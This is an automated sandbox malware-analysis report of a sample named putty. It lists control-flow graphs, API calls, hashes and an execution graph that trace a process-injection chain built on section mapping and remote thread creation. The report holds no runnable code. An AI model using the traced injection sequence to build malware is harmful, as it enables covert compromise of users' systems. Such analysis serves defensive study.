                                                                                                                          control_flow_graph 0 60003c-600047 1 600049 0->1 2 60004c-600263 call 600a3f call 600e0f call 600d90 VirtualAlloc 0->2 1->2 17 600265-600289 call 600a69 2->17 18 60028b-600292 2->18 23 6002ce-6003c2 VirtualProtect call 600cce call 600ce7 17->23 20 6002a1-6002b0 18->20 22 6002b2-6002cc 20->22 20->23 22->20 29 6003d1-6003e0 23->29 30 6003e2-600437 call 600ce7 29->30 31 600439-6004b8 VirtualFree 29->31 30->29 33 6005f4-6005fe 31->33 34 6004be-6004cd 31->34 37 600604-60060d 33->37 38 60077f-600789 33->38 36 6004d3-6004dd 34->36 36->33 41 6004e3-600505 36->41 37->38 39 600613-600637 37->39 42 6007a6-6007b0 38->42 43 60078b-6007a3 38->43 44 60063e-600648 39->44 54 600517-600520 41->54 55 600507-600515 41->55 45 6007b6-6007cb 42->45 46 60086e-6008be LoadLibraryA 42->46 43->42 44->38 48 60064e-60065a 44->48 47 6007d2-6007d5 45->47 53 6008c7-6008f9 46->53 50 600824-600833 47->50 51 6007d7-6007e0 47->51 48->38 52 600660-60066a 48->52 60 600839-60083c 50->60 57 6007e2 51->57 58 6007e4-600822 51->58 59 60067a-600689 52->59 61 600902-60091d 53->61 62 6008fb-600901 53->62 56 600526-600547 54->56 55->56 63 60054d-600550 56->63 57->50 58->47 64 600750-60077a 59->64 65 60068f-6006b2 59->65 60->46 66 60083e-600847 60->66 62->61 68 6005e0-6005ef 63->68 69 600556-60056b 63->69 64->44 70 6006b4-6006ed 65->70 71 6006ef-6006fc 65->71 72 600849 66->72 73 60084b-60086c 66->73 68->36 74 60056d 69->74 75 60056f-60057a 69->75 70->71 76 60074b 71->76 77 6006fe-600748 71->77 72->46 73->60 74->68 78 60059b-6005bb 75->78 79 60057c-600599 75->79 76->59 77->76 84 6005bd-6005db 78->84 79->84 84->63
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0060024D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_600000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction ID: bbbf4db3596f4485a88410cc2d3c193017e3a9667bdecbbed5112f2fd1dd1f22
                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                          • Instruction Fuzzy Hash: 02526974A01229DFDB64CF58C985BA9BBB1BF09304F1480E9E54DAB391DB30AE85DF14

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 326 600e0f-600e24 SetErrorMode * 2 327 600e26 326->327 328 600e2b-600e2c 326->328 327->328
                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00600223,?,?), ref: 00600E19
                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00600223,?,?), ref: 00600E1E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_600000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorMode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2340568224-0
                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction ID: 5e5b7fc9be17af52c8aa1593ebc2cf7226538b4808b2ec5a12ddc81c56322646
                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                          • Instruction Fuzzy Hash: 08D0123114512877D7002A94DC09BCE7B1CDF05B62F008411FB0DE9180C770994046E5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 329 40bc65-40bc6f call 40baca 331 40bc74-40bc81 329->331
                                                                                                                          APIs
                                                                                                                          • __setmbcp.LIBCMT ref: 0040BC6F
                                                                                                                            • Part of subcall function 0040BACA: getSystemCP.LIBCMT ref: 0040BAEF
                                                                                                                            • Part of subcall function 0040BACA: __malloc_crt.LIBCMT ref: 0040BB05
                                                                                                                            • Part of subcall function 0040BACA: __setmbcp_nolock.LIBCMT ref: 0040BB28
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493409629.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_40b000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: System__malloc_crt__setmbcp__setmbcp_nolock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1786829287-0
                                                                                                                          • Opcode ID: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                          • Instruction ID: ab897626d73dbb0745f55126157d0f546fefb95dfe1eb26feed99d3202435efc
                                                                                                                          • Opcode Fuzzy Hash: 3d85cd77d6638d75a46b3ac3e0861278f81fee0c3a07de576723b0644236972b
                                                                                                                          • Instruction Fuzzy Hash: 53C02B510080800CD7008B207C0570F3550EF41330F24022EF010C04C6DB695440314C

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 554 401891-4018c1 561 4018d2 554->561 562 4018c9-4018f7 call 40113b Sleep call 4013bf 554->562 561->562 568 401906-40194c call 40113b 562->568 569 4018f9-401901 call 4014b5 562->569 569->568
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                          • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                                                                                                          • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                                                                                                          • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 583 4018a9-4018c1 590 4018d2 583->590 591 4018c9-4018f7 call 40113b Sleep call 4013bf 583->591 590->591 597 401906-40194c call 40113b 591->597 598 4018f9-401901 call 4014b5 591->598 598->597
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                          • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                                                                                                          • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                                                                                                          • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                          • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                                                                                                          • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                                                                                                          • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                          • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                                                                                                          • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                                                                                                          • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005419D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493586854.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_530000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4275171209-0
                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction ID: 995cba72c42569d995567d0f688205392ed3a7af4c51bcef391cae3ba8d7b1de
                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                          • Instruction Fuzzy Hash: 18113C79A40208EFDB01DF98C985E98BFF5AF08351F158094F9889B362D371EA90DF84
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                                                                                            • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                            • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4152845823-0
                                                                                                                          • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                          • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                                                                                                          • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                                                                                                          • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_600000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                          • API String ID: 0-2784972518
                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                          • Instruction ID: ca3e0dc928b3eb58f5f920a532e04de175240ee417e0ebceb62b96e15e73e0bb
                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                          • Instruction Fuzzy Hash: 683137B6900609DFEB14CF99C880BAEBBF6FF48324F25504AD441A7351D771EA45CBA4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493586854.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_530000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                          • Instruction ID: ba3bb6136c8dacd767448c19b0336dc6ab0f791354aa626db360880a9d602d49
                                                                                                                          • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                          • Instruction Fuzzy Hash: FA11AC72340500AFDB00CF55DC81EE277EAFB89324B298065E909CB302E676EC82CB64
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                                                                                                          • Instruction ID: b4d99e39562e0a8d34f4e8a2adcb899dff0217260de8cdfa4497104cdd6e8b78
                                                                                                                          • Opcode Fuzzy Hash: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                                                                                                          • Instruction Fuzzy Hash: 7A117A22B1C21196E3179A918A460A97710DB11360B74C87BD493BB8F3C27D98066BCB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                                                                                                          • Instruction ID: 9c1a6264578523f2b95dbae5c8345fb03cc7a3f7f5b051fb9d7a91e089220ce3
                                                                                                                          • Opcode Fuzzy Hash: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                                                                                                          • Instruction Fuzzy Hash: 06118C27A1C20096E3179A90C6461A5B760DB12360B74887BD493778F3D17D58065BCF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                                                                                                          • Instruction ID: 7cced9f7fdb1c3f7b009c6269bf5343d8ea2104f00e9896e504acad3335f8aa1
                                                                                                                          • Opcode Fuzzy Hash: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                                                                                                          • Instruction Fuzzy Hash: 1811AB23F1C20056E3179F91C6460A8B760DB12360B748C7FD4826B8F7D27D98129BCB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                                                                                                          • Instruction ID: 5938fd262c6d7fd7e9059b2c6d5fc66a7b7b37341f859f3ef56555a79cfd23f8
                                                                                                                          • Opcode Fuzzy Hash: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                                                                                                          • Instruction Fuzzy Hash: 0401AB33F1C20056E3179AA0C6860A9B760DB12360B74887BD482678F3D23D98025BCF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                                                                                                          • Instruction ID: 34643119912da5106e2d45a94dd8d32290489c90b68d507143b233416c26121d
                                                                                                                          • Opcode Fuzzy Hash: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                                                                                                          • Instruction Fuzzy Hash: A101BD23F2821055D71B9BA0C6860E8BB20DA12360B7489BBD052778F3D23C94028BCD
                                                                                                                          APIs
                                                                                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                                                                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493379065.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_400000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateDuplicateObjectSection
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3132048701-0
                                                                                                                          • Opcode ID: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                                                                                                          • Instruction ID: 94d0d6187efa1b4f5fb96639de9bee4adb18fcc7c1e699108f742e7c63bf3b1b
                                                                                                                          • Opcode Fuzzy Hash: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                                                                                                          • Instruction Fuzzy Hash: FF019953F2D64126D72B9FA086460D9BB20E9133B07748DBFD4A267CF7C274941487C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493715526.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_600000_putty.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                          • Instruction ID: 0d8b75db3329e727e2f298a538b10a5da1ac7c04e1debf53f6a48a6320adb0d8
                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                          • Instruction Fuzzy Hash: FD01A7766406048FEF25CF64C804BEB33E6EF85315F4544E5D506973C2E774A9418B90
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.1493409629.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_4_2_40b000_putty.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3016257755-0
                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                          • Instruction ID: e950241f73d42944cd710210a14d6297da0e762eb9f253b78aae5045d500f0ca
                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                          • Instruction Fuzzy Hash: 5511723210014ABBCF229E84CC418EE3F26BB58354B188436FE1864971D33AC9B5AF85

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:6.2%
                                                                                                                          Dynamic/Decrypted Code Coverage:80.9%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:162
                                                                                                                          Total number of Limit Nodes:6
                                                                                                                          execution_graph 7530 4013ca 7531 4013d0 7530->7531 7532 401564 NtDuplicateObject 7531->7532 7541 401478 7531->7541 7533 401581 NtCreateSection 7532->7533 7532->7541 7534 401601 NtCreateSection 7533->7534 7535 4015a7 NtMapViewOfSection 7533->7535 7536 40162d 7534->7536 7534->7541 7535->7534 7537 4015ca NtMapViewOfSection 7535->7537 7538 401637 NtMapViewOfSection 7536->7538 7536->7541 7537->7534 7539 4015e8 7537->7539 7540 40165e NtMapViewOfSection 7538->7540 7538->7541 7539->7534 7540->7541 7379 402f8f 7380 4030d2 7379->7380 7381 402fb9 7379->7381 7381->7380 7382 403074 RtlCreateUserThread NtTerminateProcess 7381->7382 7382->7380 7452 40148f 7453 401414 7452->7453 7459 401478 7452->7459 7454 401564 NtDuplicateObject 7453->7454 7453->7459 7455 401581 NtCreateSection 7454->7455 7454->7459 7456 401601 NtCreateSection 7455->7456 7457 4015a7 NtMapViewOfSection 7455->7457 7458 40162d 7456->7458 7456->7459 7457->7456 7460 4015ca NtMapViewOfSection 7457->7460 7458->7459 7461 401637 NtMapViewOfSection 7458->7461 7460->7456 7462 4015e8 7460->7462 7461->7459 7463 40165e NtMapViewOfSection 7461->7463 7462->7456 7463->7459 7305 402e51 7306 402e44 7305->7306 7307 402ef2 7306->7307 7309 401891 7306->7309 7310 4018a1 7309->7310 7311 4018da Sleep 7310->7311 7316 4013bf 7311->7316 7313 4018f5 7315 401906 7313->7315 7328 4014b5 7313->7328 7315->7307 7317 4013d0 7316->7317 7318 401564 NtDuplicateObject 7317->7318 7323 401478 7317->7323 7319 401581 NtCreateSection 7318->7319 7318->7323 7320 401601 NtCreateSection 7319->7320 7321 4015a7 NtMapViewOfSection 7319->7321 7322 40162d 7320->7322 7320->7323 7321->7320 7324 4015ca NtMapViewOfSection 7321->7324 7322->7323 7325 401637 NtMapViewOfSection 7322->7325 7323->7313 7324->7320 7326 4015e8 7324->7326 7325->7323 7327 40165e NtMapViewOfSection 7325->7327 7326->7320 7327->7323 7329 4014c6 7328->7329 7330 401564 NtDuplicateObject 7329->7330 7335 401680 7329->7335 7331 401581 NtCreateSection 7330->7331 7330->7335 7332 401601 NtCreateSection 7331->7332 7333 4015a7 NtMapViewOfSection 7331->7333 7334 40162d 7332->7334 7332->7335 7333->7332 7336 4015ca NtMapViewOfSection 7333->7336 7334->7335 7337 401637 NtMapViewOfSection 7334->7337 7335->7315 7336->7332 7338 4015e8 7336->7338 7337->7335 7339 40165e NtMapViewOfSection 7337->7339 7338->7332 7339->7335 7428 4014d3 7429 4014d8 7428->7429 7430 401564 NtDuplicateObject 7429->7430 7435 401680 7429->7435 7431 401581 NtCreateSection 7430->7431 7430->7435 7432 401601 NtCreateSection 7431->7432 7433 4015a7 NtMapViewOfSection 7431->7433 7434 40162d 7432->7434 7432->7435 7433->7432 7436 4015ca NtMapViewOfSection 7433->7436 7434->7435 7437 401637 NtMapViewOfSection 7434->7437 7436->7432 7438 4015e8 7436->7438 7437->7435 7439 40165e NtMapViewOfSection 7437->7439 7438->7432 7439->7435 7395 5c0005 7400 5c092b GetPEB 7395->7400 7397 5c0030 7402 5c003c 7397->7402 7401 5c0972 7400->7401 7401->7397 7403 5c0049 7402->7403 7404 5c0e0f 2 API calls 7403->7404 7405 5c0223 7404->7405 7406 5c0d90 GetPEB 7405->7406 7407 5c0238 VirtualAlloc 7406->7407 7408 5c0265 7407->7408 7409 5c02ce VirtualProtect 7408->7409 7411 5c030b 7409->7411 7410 5c0439 VirtualFree 7414 5c04be LoadLibraryA 7410->7414 7411->7410 7413 5c08c7 7414->7413 7464 40189c 7465 4018ae 7464->7465 7466 4018da Sleep 7465->7466 7467 4013bf 7 API calls 7466->7467 7468 4018f5 7467->7468 7469 4014b5 7 API calls 7468->7469 7470 401906 7468->7470 7469->7470 7415 5c0001 7416 5c0005 7415->7416 7417 5c092b GetPEB 7416->7417 7418 5c0030 7417->7418 7419 5c003c 7 API calls 7418->7419 7420 5c0038 7419->7420 7286 5c003c 7287 5c0049 7286->7287 7299 5c0e0f SetErrorMode SetErrorMode 7287->7299 7292 5c0265 7293 5c02ce VirtualProtect 7292->7293 7295 5c030b 7293->7295 7294 5c0439 VirtualFree 7298 5c04be LoadLibraryA 7294->7298 7295->7294 7297 5c08c7 7298->7297 7300 5c0223 7299->7300 7301 5c0d90 7300->7301 7302 5c0dad 7301->7302 7303 5c0dbb GetPEB 7302->7303 7304 5c0238 VirtualAlloc 7302->7304 7303->7304 7304->7292 7340 40bc65 7343 40baca 7340->7343 7342 40bc74 7344 40bad6 getSystemCP __setmbcp __malloc_crt 7343->7344 7346 40bb2d __setmbcp 7344->7346 7347 40b8e5 7344->7347 7346->7342 7350 40b905 getSystemCP __setmbcp_nolock 7347->7350 7348 40b910 setSBCS 7348->7346 7350->7348 7351 40b632 7350->7351 7352 40b659 ___crtGetStringTypeA 7351->7352 7356 40b718 7352->7356 7357 40ff63 7352->7357 7355 40ff63 ___crtLCMapStringA LCMapStringW 7355->7356 7356->7350 7358 40ff76 7357->7358 7361 40fbbe 7358->7361 7360 40b6f3 7360->7355 7362 40fbdf LCMapStringW 7361->7362 7363 40fbfa __freea ___convertcp ___ansicp 7361->7363 7362->7363 7363->7360 7497 402d2c 7499 402d35 7497->7499 7498 401891 15 API calls 7500 402ef2 7498->7500 7499->7498 7499->7500 7364 561520 7365 56152f 7364->7365 7368 561cc0 7365->7368 7374 561cdb 7368->7374 7369 561ce4 CreateToolhelp32Snapshot 7370 561d00 